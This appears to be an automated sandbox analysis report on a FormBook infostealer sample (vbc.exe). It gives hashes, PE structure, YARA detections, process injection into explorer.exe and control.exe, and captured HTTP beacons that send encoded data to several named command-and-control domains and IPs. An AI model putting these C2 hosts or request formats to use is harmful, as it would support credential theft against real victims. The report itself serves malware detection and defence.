                                                TrID:
                                                • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                • Win32 Executable (generic) a (10002005/4) 49.78%
                                                • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                • Generic Win/DOS Executable (2004/3) 0.01%
                                                • DOS Executable Generic (2002/1) 0.01%
                                                File name:vbc.exe
                                                File size:794112
                                                MD5:ba5fa6ee78fe62b57ce7947f6bdb86ff
                                                SHA1:f8409167b9b3e09f390c28cbcebfbec670af16de
                                                SHA256:c2073d015c278a0816ca4ae0a19892874782517dd5133a112ca1f57d44f754fb
                                                SHA512:30649250ca8c07fbfd53c7d343beacec91cad8535e773e3d8b97aef3a678a981fbb6ab5646318d890303fb643938c78152cbe8774230591b4660102677545d35
                                                SSDEEP:12288:rFxgV2iNq+1MMUOS1BuMU0WthpYCXB4eAwRXIbUDbLDuXk:rFxgV10PqMeQe9IbUDHDl
                                                TLSH:C4F4BE1BAF147308C9A76AB5EE4BB9A267F71C1D3135D0783E557C4A4AFF301E52202A
                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...P..b..............0..............4... ...@....@.. ....................................@................................
                                                Icon Hash:00828e8e8686b000
                                                Entrypoint:0x4c34ce
                                                Entrypoint Section:.text
                                                Digitally signed:false
                                                Imagebase:0x400000
                                                Subsystem:windows gui
                                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                Time Stamp:0x62F0E250 [Mon Aug 8 10:15:44 2022 UTC]
                                                TLS Callbacks:
                                                CLR (.Net) Version:
                                                OS Version Major:4
                                                OS Version Minor:0
                                                File Version Major:4
                                                File Version Minor:0
                                                Subsystem Version Major:4
                                                Subsystem Version Minor:0
                                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                Instruction
                                                jmp dword ptr [00402000h]
                                                 Name | Virtual Address | Virtual Size | Is in Section
                                                 IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                                 IMAGE_DIRECTORY_ENTRY_IMPORT | 0xc347c | 0x4f | .text
                                                 IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xc4000 | 0x388 | .rsrc
                                                 IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                                 IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                                 IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xc6000 | 0xc | .reloc
                                                 IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                                 IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                                 IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                                 IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                                 IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                                 IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                                 IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
                                                 IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                                 IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
                                                 IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                                 Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                                 .text | 0x2000 | 0xc14d4 | 0xc1600 | False | 0.810875131302521 | data | 7.777091407724558 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                 .rsrc | 0xc4000 | 0x388 | 0x400 | False | 0.369140625 | data | 2.842876085485628 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                 .reloc | 0xc6000 | 0xc | 0x200 | False | 0.044921875 | data | 0.09800417566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                 Name | RVA | Size | Type | Language | Country
                                                 RT_VERSION | 0xc4058 | 0x32c | data | |
                                                 DLL | Import
                                                 mscoree.dll | _CorExeMain
                                                 Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
                                                 Aug 8, 2022 16:11:09.126292944 CEST | 192.168.2.6 | 8.8.8.8 | 0x35 | Standard query (0) | www.funwave.info | A (IP address) | IN (0x0001)
                                                 Aug 8, 2022 16:11:19.962970972 CEST | 192.168.2.6 | 8.8.8.8 | 0xf0f3 | Standard query (0) | www.reprograme-se10x.com | A (IP address) | IN (0x0001)
                                                 Aug 8, 2022 16:11:27.599814892 CEST | 192.168.2.6 | 8.8.8.8 | 0x9609 | Standard query (0) | www.tadeumilhosrp.com | A (IP address) | IN (0x0001)
                                                 Aug 8, 2022 16:11:35.113869905 CEST | 192.168.2.6 | 8.8.8.8 | 0x5e59 | Standard query (0) | www.claudianavarro.online | A (IP address) | IN (0x0001)
                                                 Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                                                 Aug 8, 2022 16:11:09.145854950 CEST | 8.8.8.8 | 192.168.2.6 | 0x35 | No error (0) | www.funwave.info | | 103.141.97.24 | A (IP address) | IN (0x0001)
                                                 Aug 8, 2022 16:11:19.980540037 CEST | 8.8.8.8 | 192.168.2.6 | 0xf0f3 | No error (0) | www.reprograme-se10x.com | reprograme-se10x.com | | CNAME (Canonical name) | IN (0x0001)
                                                 Aug 8, 2022 16:11:19.980540037 CEST | 8.8.8.8 | 192.168.2.6 | 0xf0f3 | No error (0) | reprograme-se10x.com | | 108.167.169.56 | A (IP address) | IN (0x0001)
                                                 Aug 8, 2022 16:11:27.619285107 CEST | 8.8.8.8 | 192.168.2.6 | 0x9609 | No error (0) | www.tadeumilhosrp.com | tadeumilhosrp.com | | CNAME (Canonical name) | IN (0x0001)
                                                 Aug 8, 2022 16:11:27.619285107 CEST | 8.8.8.8 | 192.168.2.6 | 0x9609 | No error (0) | tadeumilhosrp.com | | 192.185.131.238 | A (IP address) | IN (0x0001)
                                                 Aug 8, 2022 16:11:35.238023996 CEST | 8.8.8.8 | 192.168.2.6 | 0x5e59 | No error (0) | www.claudianavarro.online | claudianavarro.online | | CNAME (Canonical name) | IN (0x0001)
                                                 Aug 8, 2022 16:11:35.238023996 CEST | 8.8.8.8 | 192.168.2.6 | 0x5e59 | No error (0) | claudianavarro.online | | 92.249.45.183 | A (IP address) | IN (0x0001)
                                                • www.funwave.info
                                                • www.reprograme-se10x.com
                                                • www.tadeumilhosrp.com
                                                 Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                 0 | 192.168.2.6 | 49796 | 103.141.97.24 | 80 | C:\Windows\explorer.exe
                                                 Timestamp | kBytes transferred | Direction | Data
                                                 Aug 8, 2022 16:11:09.452039003 CEST | 11238 | OUT | GET /etn4/?jDK=cFN0wh5pOr2lLXB&cRvt5xTh=Cta36k8ikZqurnipoxkRmmGd40Kya2aSborXxyuf+Fe+qece1yHxQlddjwwspvxEwVKtNXVfvaYDvAKdsC9znF0tof1OuukDyDlLohNqUsvE HTTP/1.1
                                                Host: www.funwave.info
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:
                                                 Aug 8, 2022 16:11:09.803188086 CEST | 11239 | IN | HTTP/1.1 301 Moved Permanently
                                                Server: nginx
                                                Date: Mon, 08 Aug 2022 14:11:09 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Content-Length: 0
                                                Connection: close
                                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                Cache-Control: no-cache, must-revalidate, max-age=0
                                                X-Redirect-By: WordPress
                                                Location: http://funwave.info/etn4/?jDK=cFN0wh5pOr2lLXB&cRvt5xTh=Cta36k8ikZqurnipoxkRmmGd40Kya2aSborXxyuf+Fe+qece1yHxQlddjwwspvxEwVKtNXVfvaYDvAKdsC9znF0tof1OuukDyDlLohNqUsvE


                                                 Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                 1 | 192.168.2.6 | 49798 | 108.167.169.56 | 80 | C:\Windows\explorer.exe
                                                 Timestamp | kBytes transferred | Direction | Data
                                                 Aug 8, 2022 16:11:20.131123066 CEST | 11247 | OUT | POST /etn4/ HTTP/1.1
                                                Host: www.reprograme-se10x.com
                                                Connection: close
                                                Content-Length: 418
                                                Cache-Control: no-cache
                                                Origin: http://www.reprograme-se10x.com
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Content-Type: application/x-www-form-urlencoded
                                                Accept: */*
                                                Referer: http://www.reprograme-se10x.com/etn4/
                                                Accept-Language: en-US
                                                Accept-Encoding: gzip, deflate
                                                Data Ascii: cRvt5xTh=rqNiFJkdaDeH1Hn6ZDauI8rXyO~FcngIhGhUWTs9j8tWJRmEEZWyIptysPQqY8AcSuQ3D_x_Tsx9I4WnbXgEqWwgJ5tleUn9xqu0Xg05XHajNOcInNdXYny596jAf0U3wJTsYM5OvgHjRh2HIhs0x2PVq8bP1WvfRG6AJ9D_8WmuSuZIu_zc6x8ytiFyVk(Zc49xmPTJnkmRpO5hx_VdgwKxlZ2qjpWvcNLa7HPQLk60E0l6GbUCA-Yjr1DGv9X2IfgoCfDpWQDELw7BjrYh0FkgFWSL28ssp4O7ZRH61G9cqzav0OjD1H5eFWRA38FaSosyn_mQtaT-dnYzceiSpzeBs5KHWRY7I2ovIGXGbp914sZC~F84QGbfDBR9~bhJDLGYVI9YoPVCVrrRRuRAdUo.
                                                 Aug 8, 2022 16:11:20.450714111 CEST | 11249 | IN | HTTP/1.1 404 Not Found
                                                Date: Mon, 08 Aug 2022 14:11:20 GMT
                                                Server: Apache
                                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                Cache-Control: no-cache, must-revalidate, max-age=0
                                                Link: <https://reprograme-se10x.com/wp-json/>; rel="https://api.w.org/"
                                                Upgrade: h2,h2c
                                                Connection: Upgrade, close
                                                Vary: Accept-Encoding
                                                Content-Encoding: gzip
                                                Content-Length: 14456
                                                Content-Type: text/html; charset=UTF-8


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                2 | 192.168.2.6 | 49799 | 108.167.169.56 | 80 | C:\Windows\explorer.exe
                                                Timestamp | kBytes transferred | Direction | Data
                                                Aug 8, 2022 16:11:22.296473980 CEST | 11263 | OUT | GET /etn4/?cRvt5xTh=molCG9tOWGG77xzFdRevdPvUiNWpIWpi7GNNNgA2ifx3ZRGhVtKNJJVLj+R0F9QcWvNkIdZbD/ktNYP0MkMUr0Msa5tKdHW+1cW/UCZDWxnM&jDK=cFN0wh5pOr2lLXB HTTP/1.1
                                                Host: www.reprograme-se10x.com
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:
                                                Aug 8, 2022 16:11:22.554661036 CEST | 11264 | IN | HTTP/1.1 301 Moved Permanently
                                                Date: Mon, 08 Aug 2022 14:11:22 GMT
                                                Server: Apache
                                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                Cache-Control: no-cache, must-revalidate, max-age=0
                                                X-Redirect-By: WordPress
                                                Upgrade: h2,h2c
                                                Connection: Upgrade, close
                                                Location: http://reprograme-se10x.com/etn4/?cRvt5xTh=molCG9tOWGG77xzFdRevdPvUiNWpIWpi7GNNNgA2ifx3ZRGhVtKNJJVLj+R0F9QcWvNkIdZbD/ktNYP0MkMUr0Msa5tKdHW+1cW/UCZDWxnM&jDK=cFN0wh5pOr2lLXB
                                                Content-Length: 0
                                                Content-Type: text/html; charset=UTF-8


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                3 | 192.168.2.6 | 49800 | 192.185.131.238 | 80 | C:\Windows\explorer.exe
                                                Timestamp | kBytes transferred | Direction | Data
                                                Aug 8, 2022 16:11:27.756026030 CEST | 11265 | OUT | POST /etn4/ HTTP/1.1
                                                Host: www.tadeumilhosrp.com
                                                Connection: close
                                                Content-Length: 418
                                                Cache-Control: no-cache
                                                Origin: http://www.tadeumilhosrp.com
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Content-Type: application/x-www-form-urlencoded
                                                Accept: */*
                                                Referer: http://www.tadeumilhosrp.com/etn4/
                                                Accept-Language: en-US
                                                Accept-Encoding: gzip, deflate
                                                Data Ascii: cRvt5xTh=yTRqtBFpX_kNDvDvwXC-wzWSkqq7hONbQQiaFKIVt7mc4mQpO_TcZHCQHoLIb-VoWglITVohzldl7l6F(6QLniUtKdI9PU4gnnp5c4nYDQzcEC2vZEnJgtopBA5IQ_(15HwzHrdGHkJ42TcZO7vglnpcBtpcrfK_Vi6HLhIx5_iDtQF4Qok3Aeu_6jIfn6TiuS9FfJMjxoBlcYveCutfzOiNsAhoGzB3IoDG0T7HkEX3N2X2fHzhMdIi7g9Tlc(8yie5wegPdbB7rUhaa0(Zn5IlS9ligmiYopxieZB2awPs8SjSvbasZRcUOQ7K6UlZxCvmoBMqaMDMIXboV9arRz673S3L8-kWC2Zfj0wsJhFvOtG9(SOG3hVyl7tOM25bjMtP28(wTicBvt0W095nGqg.
                                                Aug 8, 2022 16:11:27.891092062 CEST | 11267 | IN | HTTP/1.1 404 Not Found
                                                Server: nginx/1.20.1
                                                Date: Mon, 08 Aug 2022 14:11:27 GMT
                                                Content-Type: text/html
                                                Content-Length: 3650
                                                Connection: close
                                                ETag: "616e0979-e42"
                                                Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <title>The page is not found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <style type="text/css"> /*<![CDATA[*/ body { background-color: #fff; color: #000; font-size: 0.9em; font-family: sans-serif,helvetica; margin: 0; padding: 0; } :link { color: #c00; } :visited { color: #c00; } a:hover { color: #f50; } h1 { text-align: center; margin: 0; padding: 0.6em 2em 0.4em; background-color: #294172; color: #fff; font-weight: normal; font-size: 1.75em; border-bottom: 2px solid #000; } h1 strong { font-weight:


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                4 | 192.168.2.6 | 49802 | 192.185.131.238 | 80 | C:\Windows\explorer.exe
                                                Timestamp | kBytes transferred | Direction | Data
                                                Aug 8, 2022 16:11:29.950834990 CEST | 11270 | OUT | GET /etn4/?jDK=cFN0wh5pOr2lLXB&cRvt5xTh=/R5Ku0REc5kTBOTK4FybjCic+J3HjscPDRicZMYanJDb3VFeXunUS1CfOY6dWIQDflcWbkgY3XkW9HfCwqM4rRtZZd8ZPm0cmGZ9eLaMCkCJ HTTP/1.1
                                                Host: www.tadeumilhosrp.com
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:
                                                Aug 8, 2022 16:11:30.095088959 CEST | 11275 | IN | HTTP/1.1 404 Not Found
                                                Server: nginx/1.20.1
                                                Date: Mon, 08 Aug 2022 14:11:30 GMT
                                                Content-Type: text/html
                                                Content-Length: 3650
                                                Connection: close
                                                ETag: "616e0979-e42"
                                                Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <title>The page is not found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <style type="text/css"> /*<![CDATA[*/ body { background-color: #fff; color: #000; font-size: 0.9em; font-family: sans-serif,helvetica; margin: 0; padding: 0; } :link { color: #c00; } :visited { color: #c00; } a:hover { color: #f50; } h1 { text-align: center; margin: 0; padding: 0.6em 2em 0.4em; background-color: #294172; color: #fff; font-weight: normal; font-size: 1.75em; border-bottom: 2px solid #000; } h1 strong { font-weight:



                                                Target ID: 0
                                                Start time: 16:09:21
                                                Start date: 08/08/2022
                                                Path: C:\Users\user\Desktop\vbc.exe
                                                Wow64 process (32bit): true
                                                Commandline: "C:\Users\user\Desktop\vbc.exe"
                                                Imagebase: 0x4d0000
                                                File size: 794112 bytes
                                                MD5 hash: BA5FA6EE78FE62B57CE7947F6BDB86FF
                                                Has elevated privileges: true
                                                Has administrator privileges: true
                                                Programmed in: .Net C# or VB.NET
                                                Yara matches:
                                                • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.408488225.0000000002B1D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.407071082.00000000028F3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.409203550.000000000397B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.409203550.000000000397B000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.409203550.000000000397B000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.409203550.000000000397B000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                Reputation: low

                                                Target ID: 5
                                                Start time: 16:09:34
                                                Start date: 08/08/2022
                                                Path: C:\Users\user\Desktop\vbc.exe
                                                Wow64 process (32bit): false
                                                Commandline: C:\Users\user\Desktop\vbc.exe
                                                Imagebase: 0x100000
                                                File size: 794112 bytes
                                                MD5 hash: BA5FA6EE78FE62B57CE7947F6BDB86FF
                                                Has elevated privileges: true
                                                Has administrator privileges: true
                                                Programmed in: C, C++ or other language
                                                Reputation: low

                                                Target ID: 6
                                                Start time: 16:09:36
                                                Start date: 08/08/2022
                                                Path: C:\Users\user\Desktop\vbc.exe
                                                Wow64 process (32bit): true
                                                Commandline: C:\Users\user\Desktop\vbc.exe
                                                Imagebase: 0xb00000
                                                File size: 794112 bytes
                                                MD5 hash: BA5FA6EE78FE62B57CE7947F6BDB86FF
                                                Has elevated privileges: true
                                                Has administrator privileges: true
                                                Programmed in: C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000000.403522788.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000000.403522788.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000000.403522788.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000000.403522788.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                Reputation: low

                                                Target ID: 7
                                                Start time: 16:09:44
                                                Start date: 08/08/2022
                                                Path: C:\Windows\explorer.exe
                                                Wow64 process (32bit): false
                                                Commandline: C:\Windows\Explorer.EXE
                                                Imagebase: 0x7ff77c400000
                                                File size: 3933184 bytes
                                                MD5 hash: AD5296B280E8F522A8A897C96BAB0E1D
                                                Has elevated privileges: true
                                                Has administrator privileges: true
                                                Programmed in: C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000000.463881212.000000000D63F000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000000.463881212.000000000D63F000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000000.463881212.000000000D63F000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000000.463881212.000000000D63F000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000000.484050905.000000000D63F000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000000.484050905.000000000D63F000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000000.484050905.000000000D63F000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000000.484050905.000000000D63F000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                Reputation: high

                                                Target ID: 13
                                                Start time: 16:10:22
                                                Start date: 08/08/2022
                                                Path: C:\Windows\SysWOW64\control.exe
                                                Wow64 process (32bit): true
                                                Commandline: C:\Windows\SysWOW64\control.exe
                                                Imagebase: 0xaf0000
                                                File size: 114688 bytes
                                                MD5 hash: 40FBA3FBFD5E33E0DE1BA45472FDA66F
                                                Has elevated privileges: true
                                                Has administrator privileges: true
                                                Programmed in: C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000002.632823935.0000000002DD0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000D.00000002.632823935.0000000002DD0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000002.632823935.0000000002DD0000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000002.632823935.0000000002DD0000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000002.631975004.0000000002CD0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000D.00000002.631975004.0000000002CD0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000002.631975004.0000000002CD0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000002.631975004.0000000002CD0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000002.631553136.0000000000B90000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000D.00000002.631553136.0000000000B90000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000002.631553136.0000000000B90000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000002.631553136.0000000000B90000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                Reputation: moderate

                                                No disassembly